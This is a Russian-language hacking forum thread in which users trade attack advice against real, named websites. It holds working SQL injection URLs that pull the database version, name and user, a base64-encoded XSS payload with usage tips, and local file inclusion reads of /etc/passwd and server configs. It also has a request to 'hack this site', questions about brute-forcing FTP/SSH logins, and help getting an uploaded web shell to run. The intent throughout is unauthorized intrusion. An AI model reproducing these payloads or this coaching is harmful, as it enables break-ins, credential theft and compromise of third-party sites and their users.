Ваши вопросы по уязвимостям.

http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),6,7,8,9/*

 

сёравно @localhost

 

vbulletin 3.7.1

Помогите разобраться как использовать данную XSS заранее спс.

 

2TehRn собственно ф чем проблема то ?
"PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" Это не что иное как закодированный base64 "<script>alert('XSS')</script>" собтвенно кодируй то что нужно в base и вставляй это пассивная xss на форуме оч многа написанно по этой теме читай

 

Подобрал количество полей. всё гуд, ошибки нету, но и ничего не выводит. где трабл?

 

2mr.The если мне зрение не изменяет тама нету полей для вывода один выход слепая иньекция

 

2MaSTeR GэN
и на том спасибо. а я думал туплю где-т

 

подцепил локальным инклудом файлы

/etc/passwd
etc/httpd/conf/httpd.conf

нашёл файл
phpinfo.php

из httpd.conf видно, что на хостинге есть ещё сайты. такая запись:

но приинклудить из них ничего не получается. видимо, такие настройки.

логов не нашёл =/
Загружать никаких файлов туда нельзя.

что мне можно сделать, чтобы хакнуть этот сайт?

По поводу /etc/passwd, знаю что брутят по маске Логин:Логин фтп, ссх. Скажите пожалуйста, какими брутфорсами это можно провернуть, кроме Гидры, не дружу с ней.

 

)

такого сайта нет вот и не получается проинклудить SITENAME.com )

 

нет нет. Это я изменил имя, дабы не светить сервер

 

http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),database(),password(0),user()))),6, 7,8,9/* кто знает как тут нарыть удалённый адрес для БД + можно там файлы посмотреть через иньекцию

 

Не знал куда написать. Решил сюда.
Проблема с заливкой шелла. Шелл на holm.ru, но там есть пхп, поэтому он исполняется, а некопируется... Пробовал в .htaccess прописать AddType application/force-open .php - не помогло, как видите... на холме открывается загрузка файла, на сайте с инклюдом - каракули... Подскажите что путевое в htaccess прописать чтоб пахало

 

help:
http://www.world-art.ru/games/games.php?id=4575+or+1=1
есть иньекция ?
http://www.litprom.ru/text.phtml?storycode=1'

 

http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359'
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359+order+by+5--
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359+union+select+1,2,3,4,5--
инъекция есть, но с раскруткой проблемы. подскажет кто?

 

инъекта нет

блинд скул

инъект есть, вывода нет
читай Blind Sql Inj

 

Я не уверен, но разве в SQL инъекции когда подбирают кол-во полей , ставят or 1=1?

 

Glazz
это определение.. )

base
наверно ты прав.. )

логический вывод - 5 версия, как получить вывод ?

 

А не проще на народе какой-нить аккаунт, специально для шеллов и подобного создать?

 

http://www.world-art.ru/games/games.php?id=4575+or+1=1
инъекции НЕТ!

есть:
http://www.litprom.ru/text.phtml?storycode=1'
но слепая: http://www.litprom.ru/text.phtml?storycode=20+union+select+1
логическая ошибка
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in

проходит фильтрацию. если число больше или меньше допустимого - выводится страница с ошибкой. Если нормальное (именно первое число, без остального запроса), то отправляется к БД, но уже с остальным запросом

 

я дето слышал что через иньекцию мона посмотреть какие папки на сервере мона такое очуществить и как?